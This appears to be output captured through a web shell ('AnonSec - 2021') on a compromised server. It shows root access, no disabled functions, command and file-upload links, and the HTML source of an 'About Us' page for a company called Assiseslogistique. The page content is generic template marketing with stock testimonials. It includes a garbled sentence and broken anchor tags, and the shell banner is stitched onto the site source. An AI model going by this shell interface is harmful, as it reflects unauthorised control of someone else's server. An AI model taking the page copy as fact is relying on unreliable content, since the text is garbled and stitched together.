|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/assiseslogistique.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Assiseslogistique</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<meta name="theme-variant" content="75e41117b85365e3fa3de85ce36a04ea">
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-white/95 backdrop-blur-md border-b-2 border-purple-100">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-12 h-12 bg-gradient-to-br from-purple-500 via-purple-600 to-pink-600 rounded-xl flex items-center justify-center shadow-lg transform rotate-3 hover:rotate-0 transition-transform">
<span class="text-white font-bold text-xl">A</span>
</div>
<div class="flex flex-col">
<span class="text-xl font-black text-gray-900 leading-tight">Assiseslogistique</span>
<span class="text-xs text-gray-500 font-medium">Premium Solutions</span>
</div>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-500 rounded-lg md:hidden hover:bg-gray-100">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-semibold flex flex-col md:flex-row md:space-x-6 items-center">
<li><a href="./" class="block py-2 px-3 text-gray-700 hover:text-purple-600 rounded-md hover:bg-purpleHome</a></li>
<li><a href="about-us.php" class="block py-2 px-3 text-gray-700 hover:text-purple-600 rounded-md hover:bg-purple-50 transition-all relative">About</a></li>
<li><a href="blog/" class="block py-2 px-3 text-gray-700 hover:text-purple-600 rounded-md hover:bg-purple-50 transition-all relative">
<span class="relative z-10">Blog</span>
</a></li>
<li>
<a href="contact.php" class="group relative block py-2.5 px-8 text-white bg-gradient-to-r from-purple-600 to-pink-600 rounded-xl hover:shadow-2xl transition-all overflow-hidden">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="relative py-24 bg-white" id="about">
<div class="absolute inset-0 overflow-hidden">
<div class="absolute top-1/4 left-0 w-96 h-96 bg-purple-100 rounded-full blur-3xl opacity-30"></div>
<div class="absolute bottom-1/4 right-0 w-96 h-96 bg-pink-100 rounded-full blur-3xl opacity-30"></div>
</div>
<div class="max-w-screen-xl mx-auto px-4 relative z-10">
<div class="grid lg:grid-cols-2 gap-16 items-center">
<div class="relative">
<div class="grid grid-cols-2 gap-4">
<div class="space-y-4">
<div class="relative overflow-hidden rounded-2xl shadow-xl">
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="w-full h-64 object-cover">
<div class="absolute inset-0 bg-gradient-to-t from-purple-600/80 to-transparent"></div>
</div>
<div class="p-6 bg-gradient-to-br from-purple-600 to-pink-600 rounded-2xl text-white shadow-xl">
<div class="text-4xl font-black mb-2">500+</div>
<div class="text-sm opacity-90">Projects Completed</div>
</div>
</div>
<div class="space-y-4 pt-12">
<div class="p-6 bg-gradient-to-br from-pink-50 to-white rounded-2xl border-2 border-pink-100 shadow-lg">
<div class="text-3xl font-black text-pink-600 mb-2">15+</div>
<div class="text-sm text-gray-700 font-semibold">Years Experience</div>
</div>
<div class="relative overflow-hidden rounded-2xl shadow-xl">
<div class="absolute inset-0 bg-gradient-to-br from-purple-400 to-pink-500"></div>
<div class="relative p-8 text-white">
<i class="fas fa-star text-4xl mb-4"></i>
<div class="text-2xl font-black">4.9/5</div>
<div class="text-sm opacity-90">Client Rating</div>
</div>
</div>
</div>
</div>
</div>
<div>
<div class="inline-flex items-center gap-2 px-4 py-2 bg-purple-50 text-purple-700 rounded-lg text-sm font-semibold mb-6">
<i class="fas fa-circle-notch fa-spin"></i>
Performance Enhancers </div>
<h2 class="text-5xl md:text-6xl font-black text-gray-900 mb-6 leading-tight">
Drive Sustainable Growth with Our Expert eCommerce Solutions </h2>
<p class="text-xl text-gray-600 mb-8 leading-relaxed">
Experience the profound impact of as ecommerce experts, we know that understanding your target audience is key to driving sales and revenue. our digital marketing agency offers a range of solutions designed to help you connect with your target customers, from personalized email marketing campaigns to influencer partnerships and more. with our help, you can build lasting relationships with your customers and achieve long-term growth for your business. on your journey. </p>
<div class="space-y-4 mb-8">
<div class="flex items-center gap-4">
<div class="w-2 h-2 bg-purple-600 rounded-full"></div>
<span class="text-gray-700 font-semibold">Industry-leading expertise</span>
</div>
<div class="flex items-center gap-4">
<div class="w-2 h-2 bg-pink-600 rounded-full"></div>
<span class="text-gray-700 font-semibold">Cutting-edge solutions</span>
</div>
<div class="flex items-center gap-4">
<div class="w-2 h-2 bg-purple-600 rounded-full"></div>
<span class="text-gray-700 font-semibold">Dedicated support team</span>
</div>
</div>
<a href="#contact" class="inline-flex items-center gap-3 px-8 py-4 bg-gradient-to-r from-purple-600 to-pink-600 text-white font-bold rounded-xl hover:shadow-2xl hover:scale-105 transition-all">
Find More Answers <i class="fas fa-arrow-right"></i>
</a>
</div>
</div>
</div>
</section>
<section class="py-20 bg-white" id="features">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center mb-16">
<span class="inline-block px-5 py-2 bg-white text-purple-700 rounded-full text-sm font-semibold mb-6 shadow-md border-2 border-purple-100">
Features
</span>
<h2 class="text-5xl md:text-6xl font-black text-gray-900 mb-4">Why Choose Us</h2>
<p class="text-xl text-gray-600 max-w-3xl mx-auto">Everything you need to succeed, all in one place</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8">
<div class="text-center p-8 bg-gradient-to-br from-purple-50 to-white rounded-2xl shadow-xl border-2 border-transparent hover:border-purple-200 transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-purple-500 to-pink-600 rounded-2xl flex items-center justify-center mx-auto mb-6 shadow-lg">
<i class="fas fa-rocket text-white text-2xl"></i>
</div>
<h3 class="text-xl font-black text-gray-900 mb-3">Fast Performance</h3>
<p class="text-gray-600">Lightning-fast results</p>
</div>
<div class="text-center p-8 bg-gradient-to-br from-purple-50 to-white rounded-2xl shadow-xl border-2 border-transparent hover:border-purple-200 transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-purple-500 to-pink-600 rounded-2xl flex items-center justify-center mx-auto mb-6 shadow-lg">
<i class="fas fa-shield-alt text-white text-2xl"></i>
</div>
<h3 class="text-xl font-black text-gray-900 mb-3">Secure & Safe</h3>
<p class="text-gray-600">Your data protected</p>
</div>
<div class="text-center p-8 bg-gradient-to-br from-purple-50 to-white rounded-2xl shadow-xl border-2 border-transparent hover:border-purple-200 transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-purple-500 to-pink-600 rounded-2xl flex items-center justify-center mx-auto mb-6 shadow-lg">
<i class="fas fa-headset text-white text-2xl"></i>
</div>
<h3 class="text-xl font-black text-gray-900 mb-3">24/7 Support</h3>
<p class="text-gray-600">Always here to help</p>
</div>
<div class="text-center p-8 bg-gradient-to-br from-purple-50 to-white rounded-2xl shadow-xl border-2 border-transparent hover:border-purple-200 transition-all">
<div class="w-16 h-16 bg-gradient-to-br from-purple-500 to-pink-600 rounded-2xl flex items-center justify-center mx-auto mb-6 shadow-lg">
<i class="fas fa-chart-line text-white text-2xl"></i>
</div>
<h3 class="text-xl font-black text-gray-900 mb-3">Proven Results</h3>
<p class="text-gray-600">Track your success</p>
</div>
</div>
</div>
</section>
<section class="bg-gradient-to-b from-white to-gray-100 py-20" id="testimonials">
<div class="max-w-screen-xl mx-auto px-4">
<h2 class="text-5xl font-black text-center text-gray-900 mb-20">Client Feedback</h2>
<div class="relative">
<div class="absolute top-1/2 left-0 right-0 h-1 bg-purple-200 transform -translate-y-1/2 hidden lg:block"></div>
<div class="grid md:grid-cols-3 gap-12 relative z-10">
<div class="relative">
<div class="w-16 h-16 bg-purple-600 rounded-full mx-auto mb-6 flex items-center justify-center text-white font-bold text-2xl">
CL </div>
<div class="bg-white rounded-2xl p-8 shadow-xl">
<div class="flex justify-center mb-4">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 mb-6 text-center leading-relaxed">
"ROI was evident within the first quarter. Their business acumen is second to none."
</p>
<div class="text-center border-t pt-4">
<div class="font-bold text-gray-900">Christopher Lee</div>
<div class="text-sm text-gray-600">Managing Director</div>
<div class="text-xs text-purple-600 mt-1">Pinnacle Enterprises</div>
</div>
</div>
</div>
<div class="relative">
<div class="w-16 h-16 bg-purple-600 rounded-full mx-auto mb-6 flex items-center justify-center text-white font-bold text-2xl">
AB </div>
<div class="bg-white rounded-2xl p-8 shadow-xl">
<div class="flex justify-center mb-4">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 mb-6 text-center leading-relaxed">
"They understood our vision and executed flawlessly. Revenue grew 3x within the first year of partnership."
</p>
<div class="text-center border-t pt-4">
<div class="font-bold text-gray-900">Alexandra Bennett</div>
<div class="text-sm text-gray-600">CEO</div>
<div class="text-xs text-purple-600 mt-1">TechVentures Inc</div>
</div>
</div>
</div>
<div class="relative">
<div class="w-16 h-16 bg-purple-600 rounded-full mx-auto mb-6 flex items-center justify-center text-white font-bold text-2xl">
BC </div>
<div class="bg-white rounded-2xl p-8 shadow-xl">
<div class="flex justify-center mb-4">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 mb-6 text-center leading-relaxed">
"Operational excellence redefined. Our team productivity increased by 45% in six months."
</p>
<div class="text-center border-t pt-4">
<div class="font-bold text-gray-900">Brandon Clark</div>
<div class="text-sm text-gray-600">COO</div>
<div class="text-xs text-purple-600 mt-1">Elevation Partners</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<footer class="bg-gradient-to-br from-gray-900 via-gray-800 to-gray-900 text-white">
<div class="max-w-screen-xl mx-auto px-4 py-16">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-gradient-to-br from-purple-500 to-pink-600 rounded-xl flex items-center justify-center">
<span class="text-white font-bold text-xl">A</span>
</div>
<span class="text-3xl font-bold">Assiseslogistique</span>
</a>
<p class="text-gray-400 mb-6 max-w-md">Delivering exceptional services and innovative solutions to help you achieve your goals.</p>
<div class="flex space-x-4">
<a href="#" class="w-12 h-12 bg-gray-800 hover:bg-purple-600 rounded-xl flex items-center justify-center transition-all">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-12 h-12 bg-gray-800 hover:bg-purple-600 rounded-xl flex items-center justify-center transition-all">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-12 h-12 bg-gray-800 hover:bg-purple-600 rounded-xl flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-12 h-12 bg-gray-800 hover:bg-purple-600 rounded-xl flex items-center justify-center transition-all">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Quick Links</h3>
<ul class="space-y-3 text-gray-400">
<li><a href="./" class="hover:text-purpleHome</a></li>
<li><a href="about-us.php" class="hover:text-purple-400 transition-colors">About Us</a></li>
<li><a href="blog/" class="hover:text-purpleBlog</a></li>
<li><a href="contact.php" class="hover:text-purple-400 transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6">Contact</h3>
<ul class="space-y-3 text-gray-400">
<li class="flex items-start space-x-3">
<i class="fas fa-phone text-purple-500 mt-1"></i>
<span>+1-530-271-7971</span>
</li>
<li class="flex items-start space-x-3">
<i class="fas fa-envelope text-purple-500 mt-1"></i>
<span>collaborate@assiseslogistique.com</span>
</li>
<li class="flex items-start space-x-3">
<i class="fas fa-map-marker-alt text-purple-500 mt-1"></i>
<span>258 Congress Avenue, Austin, TX 78701</span>
</li>
</ul>
</div>
</div>
<div class="border-t border-gray-700 pt-8">
<div class="md:flex md:items-center md:justify-between">
<p class="text-gray-400 text-sm">© 2026 Assiseslogistique. All rights reserved.</p>
<div class="flex space-x-6 mt-4 md:mt-0">
<a href="privacy.php" class="text-gray-400 hover:text-purple-400 text-sm transition-colors">Privacy</a>
<a href="terms.php" class="text-gray-400 hover:text-purple-400 text-sm transition-colors">Terms</a>
<a href="disclaimer.php" class="text-gray-400 hover:text-purple-400 text-sm transition-colors">Disclaimer</a>
</div>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021